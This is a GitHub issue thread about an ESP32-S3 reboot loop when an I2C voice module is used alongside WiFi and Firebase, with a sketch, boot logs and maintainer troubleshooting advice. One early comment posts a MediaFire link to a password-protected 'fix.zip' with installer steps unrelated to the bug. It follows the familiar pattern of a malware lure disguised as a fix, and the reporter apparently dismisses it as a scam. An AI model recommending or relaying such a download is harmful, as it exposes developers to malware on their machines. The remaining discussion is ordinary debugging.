espressif/arduino-esp32 #10245: i2c and Wifi not working together on ESP32-S3 Arduino Frame work

Octopaws, 2024-08-26:
### Board

ESP32-S3

### Device Description

ESP32-s3 N16R8V voard

### Hardware Configuration

GPIOs 8 and 9 is connected for i2c since that the default

### Version

latest master (checkout manually)

### IDE Name

Arduino IDE

### Operating System

Windows 11

### Flash frequency

80Mhz

### PSRAM enabled

yes

### Upload speed

921600

### Description

the ESP keeps rebooting and gives this error

ELF file SHA256: 82377065d6969205

Rebooting...
ESP-ROM:esp32s3-20210327
Build:Mar 27 2021
rst:0xc (RTC_SW_CPU_RST),boot:0x8 (SPI_FAST_FLASH_BOOT)
Saved PC:0x420b3702
SPIWP:0xee
mode:DIO, clock div:1
load:0x3fce3808,len:0x44c
load:0x403c9700,len:0xbe4
load:0x403cc700,len:0x2a68
entry 0x403c98d4

### Sketch

```cpp
#include "DFRobot_DF2301Q.h"

//I2C communication
DFRobot_DF2301Q_I2C DF2301Q;

#include <Arduino.h>
#include <FirebaseESP32.h>
#include <WiFi.h>

// Provide the token generation process info.
#include <addons/TokenHelper.h>

// Provide the RTDB payload printing info and other helper functions.
#include <addons/RTDBHelper.h>

#define API_KEY ""
#define DATABASE_URL ""
#define WIFI_SSID ""
#define WIFI_PASSWORD ""
#define USER_EMAIL ""
#define USER_PASSWORD ""

// Define Firebase Data object
FirebaseData fbdo;

FirebaseAuth auth;
FirebaseConfig config;

String relay1, relay2, relay3, relay4;

//pin declarations
#define Relay1 7
#define Relay2 5
#define Relay3 6
#define Relay4 15
#define Relay5 16
#define Relay6 17
#define WifiLed 27

bool relay1State = 0;
bool relay2State = 0;
bool relay3State = 0;

void setup() {
  Serial.begin(115200);

  // Connect to Wi-Fi
  WiFi.begin(WIFI_SSID, WIFI_PASSWORD);

  Serial.print("Connecting to Wi-Fi");
  while (WiFi.status() != WL_CONNECTED) {
    Serial.print(".");
    delay(300);
  }
  Serial.println();
  Serial.print("Connected with IP: ");
  Serial.println(WiFi.localIP());
  Serial.println();

  config.api_key = API_KEY;

  /* Assign the user sign in credentials */
  auth.user.email = USER_EMAIL;
  auth.user.password = USER_PASSWORD;
  config.database_url = DATABASE_URL;
  config.token_status_callback = tokenStatusCallback;
  Firebase.begin(&config, &auth);
  Firebase.reconnectNetwork(true);

  // i2c Connect
  while (!(DF2301Q.begin())) {
    Serial.println("Communication with device failed, please check connection");
    delay(300);
  }
```

### Debug Message

```plain
ELF file SHA256: 82377065d6969205

Rebooting...
ESP-ROM:esp32s3-20210327
Build:Mar 27 2021
rst:0xc (RTC_SW_CPU_RST),boot:0x8 (SPI_FAST_FLASH_BOOT)
Saved PC:0x420b3702
SPIWP:0xee
mode:DIO, clock div:1
load:0x3fce3808,len:0x44c
load:0x403c9700,len:0xbe4
load:0x403cc700,len:0x2a68
entry 0x403c98d4
```

### I have checked existing issues, online documentation and the Troubleshooting Guide

- [X] I confirm I have checked existing issues, online documentation and Troubleshooting guide.

ChangjingZhang, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

Octopaws, 2024-08-26:
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."
Na Jars abi na Scope

SuGlider, 2024-08-26:
>Core  1 panic'ed (LoadProhibited)

This is usually a NULL pointer or a bad pointer.
It is most probably an application error.

It is necessary that you demonstrate the issue using only ESP32 Arduino Core. No external libraries.
Please create a minimum sketch code that can be used to replicate the issue and as source code for testing it.

lbernstone, 2024-08-26:
Test with [WireScan](https://github.com/espressif/arduino-esp32/blob/master/libraries/Wire/examples/WireScan/WireScan.ino) to get your device address (should be 0x64). Then test the [WireMaster example](https://github.com/espressif/arduino-esp32/blob/master/libraries/Wire/examples/WireMaster/WireMaster.ino) with your address.  If that works, then the issue is in the library.

Octopaws, 2024-08-26:
> This is usually a NULL pointer or a bad pointer. It is most probably an application error.
>
> It is necessary that you demonstrate the issue using only ESP32 Arduino Core. No external libraries. [...]

thank you, tested with the minimum sketch seems the issue is with the  "DFRobot_DF2301Q.h" Library which is kinda odd because if i use the module alone with its minimum sketch it works. It only seems to run into errors when i pair with the other codes

closed 2024-08-27 by Octopaws

Octopaws, 2024-08-27:
if you want to fix the Library issue. Check out this branch and re-download the library, the error goes away
https://github.com/YeezB/DFRobot_DF2301Q